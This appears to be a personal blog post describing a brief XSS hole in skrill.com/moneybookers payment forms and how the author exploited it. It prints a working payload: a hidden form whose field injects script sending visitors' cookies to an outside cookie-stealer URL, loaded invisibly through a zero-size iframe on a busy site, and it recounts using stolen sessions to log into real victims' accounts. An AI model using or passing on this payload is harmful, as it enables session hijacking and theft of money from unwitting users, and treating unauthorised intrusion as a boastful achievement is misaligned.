I have been studying the wonderful world of hacking in the last months. A book I read, on pen-testing suggested looking at http://www.reddit.com/r/xss for news on xss, new methods, examples etc.

XSS is basically when you can insert some javascript code into a website.

I have never used reddit before, now I am hooked on it. I always thought of XSS a strange problem, didn’t understood how someone can attack your website or really do anything with xss, other than redirect users to another website or so, and to achieve that the XSS would have to be stored in a database or something, and displayed to other users.

Then I realized that XSS is one of the worse holes you can have on your website. One can use an xss attack to steal your cookies and basically be authorized and basically have access where you have access.

So today I saw that: http://www.reddit.com/r/xss/comments/2jea1h/xss_on_payment_form_skrill/

This was a brief skrill.com XSS vulerability. It was active for 24 hours. This guy found a form where input is not filtered.  Specifically




Is not filtered, so you can push javascript code into that website.
So how to exploit (I actually tried this and it worked).

You will have to create a form:

 <form id = "myform" action="https://www.moneybookers.com/app/payment.pl">
  <input type="hidden" name="pay_to_email" value="mesyre@gmail.com">
  <input type="hidden" name="language" value="EN">
  <input type="hidden" name="amount" value="3">
  <input type="hidden" name="currency" value="EUR">
  <input type="hidden" name="amount2_description" value="Product Price:">
  <input type="hidden" name="amount2" value="2">
  <input type="hidden" name="detail1_description" value="Product:">
  <input type="hidden" name="detail1_text"  value='test' class="col-md-9 col-xs-12"/>
  <input type="hidden" name="amount3_description" value="Product Price:">
  <input type="hidden" name="amount3" value="1">
  <input type="hidden" name="detail2_description" value="Product:">
  <input type="hidden" name="detail2_text" value="&quot;&gt;&lt;script language= &quot;JavaScript&quot;&gt;document.location=&quot;http://www.mysite.com/cookiestealer/index.php?cookie=&quot; + document.cookie;document.location=&quot;http://www.mysite.com&quot;&lt;/script&gt;">
    <input type="submit" value="h" class="col-md-3 col-xs-12"/>

Cookie stealer is a basic script (its included in the link above) Now because people don’t actually submit forms that don’t know, we add some javascript to auto submit the form:


And load it to some other (preferably hi-traffic website.

	<iframe width="0" height="0" src="http://www.mysite.com/xss.php"></iframe>

Then what happens: Every time someone gets into your website, you get their cookies. Then you visit skrill.com and use their cookies, and you are logged in as them.

I actually tried this. I left it online for 10 hours, in a high traffic website, I got 2 valid cookies, used them and logged in. I could easily sent the money to my account, Now actually being able to do that, is more important to me than actually stealing from the poor guys that I exploited, but it was sure the highlight of my hacking attempts. Its not every day that you can say you hacked skrill.com.

And it was all done with kindergarten-level knowledge in terms of hacking and some luck.

I always though that those wholes don’t exist anymore, especially in large websites. But I was wrong. Developers make mistakes every day.

This was online for a full day before they fixed it.